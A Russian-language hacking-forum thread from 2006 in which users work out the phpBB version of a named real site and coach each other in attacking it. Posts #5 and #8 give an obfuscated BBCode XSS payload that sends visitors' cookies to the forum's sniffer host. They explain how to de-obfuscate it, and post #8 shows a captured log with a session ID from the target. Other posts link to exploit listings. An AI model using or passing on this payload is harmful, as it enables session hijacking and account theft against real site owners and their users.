ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Подскажите версию phpBB http://www.onboardmagazine.ru/forum/
  #1  
Старый 28.10.2006, 12:17
Аватар для Fa1nt
Fa1nt
Новичок
Регистрация: 14.10.2006
Сообщений: 2
Провел на форуме:
7543

Репутация: 0
Отправить сообщение для Fa1nt с помощью ICQ
Exclamation Подскажите версию phpBB http://www.onboardmagazine.ru/forum/

Хотел спросить какая это весия phpBB?
http://www.onboardmagazine.ru/forum/
И если под эту версию эксплоит?Заранее всем спасибо
 
Ответить с цитированием

  #2  
Старый 28.10.2006, 12:19
Аватар для Koller
Koller
Постоянный
Регистрация: 25.07.2005
Сообщений: 471
Провел на форуме:
3465924

Репутация: 931
По умолчанию

Предположу, что версия 2.0.19
А так, читай этот топ - http://forum.antichat.ru/thread18918.html
Потом, как определишь примерную версию лезишь сюда - http://forum.antichat.ru/thread12610.html
И будет тебе счастье...
 
Ответить с цитированием

  #3  
Старый 28.10.2006, 12:32
Аватар для Fa1nt
Fa1nt
Новичок
Регистрация: 14.10.2006
Сообщений: 2
Провел на форуме:
7543

Репутация: 0
Отправить сообщение для Fa1nt с помощью ICQ
По умолчанию

А highlight баг случайно не в версии 2.0.19?
 
Ответить с цитированием

  #4  
Старый 28.10.2006, 12:42
Аватар для Koller
Koller
Постоянный
Регистрация: 25.07.2005
Сообщений: 471
Провел на форуме:
3465924

Репутация: 931
По умолчанию

Вот тебе сплойты под версию 2.0.19

_http://milw0rm.com/exploits/1457
_http://milw0rm.com/exploits/1469
_http://milw0rm.com/exploits/1661

Также глянь тут
 
Ответить с цитированием

  #5  
Старый 28.10.2006, 13:02
Аватар для _-[A.M.D]HiM@S-_
_-[A.M.D]HiM@S-_
Green member
Регистрация: 28.12.2005
Сообщений: 376
Провел на форуме:
5559831

Репутация: 1833
По умолчанию

Версия этого форума 2.0.18
В это версии есть XSS

PHP код:
[UR*L]http://www.[U*RL=http://wj.com/style=display:none;background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#100;&+#111;&+#99;&+#117;&+#109;&+#101;&+#110;&+#116;&+#46;&+#105;&+#109;&+#97;&+#103;&+#101;&+#115;&+#91;&+#49;&+#93;&+#46;&+#115;&+#114;&+#99;&+#61;&+#34;&+#104;&+#116;&+#116;&+#112;&+#58;&+#47;&+#47;&+#97;&+#110;&+#116;&+#105;&+#99;&+#104;&+#97;&+#116;&+#46;&+#114;&+#117;&+#47;&+#99;&+#103;&+#105;&+#45;&+#98;&+#105;&+#110;&+#47;&+#115;&+#46;&+#106;&+#112;&+#103;&+#63;&+#34;+document.cookie;&+#41;&+#32;]wj[/*URL][/*URL] 
Что бы воспользоваться сплойтом убираем плюсы между символами & и #(например было "&+#40" стало -"&#40")

Потом иди на снифер античата и лови куки
 
Ответить с цитированием

  #6  
Старый 28.10.2006, 13:08
Аватар для Koller
Koller
Постоянный
Регистрация: 25.07.2005
Сообщений: 471
Провел на форуме:
3465924

Репутация: 931
По умолчанию

Коллега, Вы правы )
Проверил эту xss, работает, значит версия не выше 2.0.18...
Так что дерзай, автор топика...
 
Ответить с цитированием

  #7  
Старый 28.10.2006, 15:11
Аватар для IOBOWAN
IOBOWAN
Новичок
Регистрация: 15.09.2006
Сообщений: 27
Провел на форуме:
52210

Репутация: 2
По умолчанию

чтото у меня хсска не прокатила((
p.s плюсы убрал
мож что еще надо сделать???
 
Ответить с цитированием

  #8  
Старый 28.10.2006, 15:16
Аватар для Koller
Koller
Постоянный
Регистрация: 25.07.2005
Сообщений: 471
Провел на форуме:
3465924

Репутация: 931
По умолчанию

Цитата:
Сообщение от IOBOWAN  
чтото у меня хсска не прокатила((
p.s плюсы убрал
мож что еще надо сделать???
Все работает...еще раз только что проверил...
Вводишь с тексте сообщения
Код:
[UR*L]http://www.[U*RL=http://wj.com/style=display:none;background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#100;&+#111;&+#99;&+#117;&+#109;&+#101;&+#110;&+#116;&+#46;&+#105;&+#109;&+#97;&+#103;&+#101;&+#115;&+#91;&+#49;&+#93;&+#46;&+#115;&+#114;&+#99;&+#61;&+#34;&+#104;&+#116;&+#116;&+#112;&+#58;&+#47;&+#47;&+#97;&+#110;&+#116;&+#105;&+#99;&+#104;&+#97;&+#116;&+#46;&+#114;&+#117;&+#47;&+#99;&+#103;&+#105;&+#45;&+#98;&+#105;&+#110;&+#47;&+#115;&+#46;&+#106;&+#112;&+#103;&+#63;&+#34;+document.cookie;&+#41;&+#32;]wj[/*URL][/*URL]
Не забываем убирать плюсы и звездочки...
Заходишь сюда затем - http://antichat.ru/sniff/log.php
Как доказательство того, что работает:

Цитата:
[Sat Oct 28 15:12:47 2006] IP=83.237.**.*** SITE=www.onboardmagazine.ru
REFERER=http://www.onboardmagazine.ru/forum/posting.php
QUERY=phpbb2mysql_data=a:2:{s:11:"autologinid";s:0 :"";s:6:"userid";i:-1;}; phpbb2mysql_sid=56b611340396fa83c6aa7ef95c10aaff; phpbb2mysql_data=a:2:{s:11:"autologinid";s:0:"";s: 6:"userid";i:-1;}
AGENT=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Если опять не получится стучи в асю...помогу...
Ах да...забыл еще сказать...наврядли у тебя получится заполучить куки админа потому как наврядли он вовсе свой форум посещает...
Форум запустили...там рекламы больше чем обычных постов...

Последний раз редактировалось Koller; 28.10.2006 в 15:21..
 
Ответить с цитированием

  #9  
Старый 28.10.2006, 15:36
Аватар для IOBOWAN
IOBOWAN
Новичок
Регистрация: 15.09.2006
Сообщений: 27
Провел на форуме:
52210

Репутация: 2
По умолчанию

ооо всё прокатило.
оказывается надобыло через експлорер зайти..
а через оперу не катит
 
Ответить с цитированием

  #10  
Старый 28.10.2006, 16:15
Аватар для guest3297
guest3297
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520

Репутация: 2996


По умолчанию

_http://www.onboardmagazine.ru/forum/docs/INSTALL.html
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Подскажите уязвимости phpBB на PHPNuke L1on Форумы 8 23.05.2006 05:19
Подскажите версию форума Gho_st Форумы 10 20.02.2006 20:10
Подскажите Proxy $ZLO$ Болталка 3 06.02.2005 14:29



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ